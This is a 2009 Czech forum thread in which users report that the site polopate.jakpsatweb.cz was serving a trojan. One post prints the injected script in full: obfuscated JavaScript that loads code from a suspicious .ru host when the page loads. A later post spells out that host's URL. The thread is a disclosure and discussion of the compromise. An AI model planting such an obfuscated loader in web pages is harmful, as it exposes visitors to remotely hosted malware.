| Autor | Zpráva | ||
|---|---|---|---|
| zeli Profil * |
#1 · Zasláno: 25. 12. 2009, 22:55:50
Ahoj,
jen jsem chtěl upozornit na to, že mi dnes avast! našel na webu polopatě.jakpsatweb.cz trojana. nebyl jsem tam hodně dlouho, takže to může být docela dlouho... Doufám že si tohle přečte Yůhů, a něco s tím udělá/řekne mi že jde o planý poplach... Díky, David K. |
||
| mckay Profil |
zeli:
Možná by bylo dobré uvést na které stránce přesně. Moderátor Alphard: Ale ne jako klikatelný odkaz.
|
||
| zeli Profil * |
#3 · Zasláno: 25. 12. 2009, 23:24:39
Omlouvám se, myslel jsem že to bude jasné, prostě na homepage - nevím jak tam je .htaccess a znova tam nepolezu, ale prostě když jsem do prohlížeče zadal polopate.jakpsatweb.cz...
|
||
| Joker Profil |
#4 · Zasláno: 25. 12. 2009, 23:57:38
Skutečně tam je:
<script>/*GNU GPL*/
try{
window.onload = function(){
var Ough2ae2vnvr = document.createElement('s&$)c!r()$i#&$p!$)$t!'.replace(/\)|\^|\$|&|@|\!|#|\(/ig, ''));
Ough2ae2vnvr.setAttribute('type', 'text/javascript');
Ough2ae2vnvr.setAttribute('src', 'h^@t!)!@t^($p$):)&$/$(/#y^&@a$(&h^)o#@$(o!)-$c@(o@-&!)$j^$(p@#&#.(^a^@d@m^i$n^(5$!@.#@#c@#^o$@#m).$g#o()!-@!c&$!o(@#$m$).#!!s&()@)i^&m&!(^#p!(&#$l#)^e@!h&#o^#m&&((e$#l(@i(@&n!!!k$&(.)#r#&&u^^:)$)#8@0&(8@0#)(/$(@g)o)!o$!$g)^l($(e$&#.(#@c@#o(m&/)g$&o!o$#))g#$l!$(e^@^$.)$c@^#o!m#&)#/#(&i^@p^@&!1$#3@^)8)$^.!$))&c!##)o^$m@@$/^^a@^$t$@&@@w#&i&&(k!&()i!.(&)j)#p$$@$/^)t#!^r^$!a)@^v&#@(#i^a$($n)($.^&a#e!!/)@'.replace(/\(|&|\)|#|\!|\^|\$|@/ig, ''))
Ough2ae2vnvr.setAttribute('defer', 'defer');
Ough2ae2vnvr.setAttribute('id', 'O))!!x&$o)$(p)&!e&#i!&l#^!&0)m&)!s^(^)q!#!$)'.replace(/\)|\!|\(|\$|#|&|@|\^/ig, ''));
document.body.appendChild(Ough2ae2vnvr);
}
}
catch(e) {}
</script> |
||
| Joker Profil |
#5 · Zasláno: 26. 12. 2009, 00:14:06 · Upravil/a: Joker
Další informace:
- Ten kód je na každé stránce, kterou jsem na polopate.jakpsatweb.cz zkoušel - Skript který to vkládá je prázdný, alespoň u mě. Buď tam výkonný skript (ještě?) není, nebo si možná vybírá jen některé prohlížeče (poznámka, skript se čte z adresy: http://yahoo-co-jp.admin5.com.go-com.simplehomelink.ru:8080/google.com/google.com/ip138.com/atwiki.jp/travian.ae/ - kdo by chtěl zkontrolovat, jestli se tam neobjeví nějaký kód. Samotné zobrazení té adresy v prohlížeči by mělo být bezpečné) - V archivu Google jsem našel čistou verzi z 19.12. - Kdo jste v kontaktu s Yuhůem, můžete mu dát vědět? |
||
| Chamurappi Profil |
#6 · Zasláno: 26. 12. 2009, 00:36:18
Reaguji na Jokera:
„Kdo jste v kontaktu s Yuhůem, můžete mu dát vědět?“ Kdokoli mu může napsat e-mail. Možná by byla vhodnějším adresátem ta slečna, která polopate.jakpsatweb.cz píše, protože jestli někomu uniklo heslo a je infikovaná jen tato část JPW, bude s tím mít asi něco společného. |
||
| zeli Profil * |
#7 · Zasláno: 26. 12. 2009, 10:29:20
Já jsem se snažil najít kontakt na Yuhůa a jediné informace co jsem našel vedly sem - do diskuze...
Nemám nějak ultra zabezpečený počítač(comodo, avast, xp aktualizace) a s kódy zas tolik neumím, radši další akce nechám na lidech co tomu rozumí... btw, [#4] Joker - mě se to stalo v Google chrome 4.0.249.43 (mám pocit že je to ještě beta...) |
||
|
Časová prodleva: 3 dny
|
|||
| Bubák Profil |
#8 · Zasláno: 29. 12. 2009, 01:58:26
Koukám, že web polopate.jakpsatweb.cz už je bez breberek.
|
||
|
Časová prodleva: 14 let
|
|||
0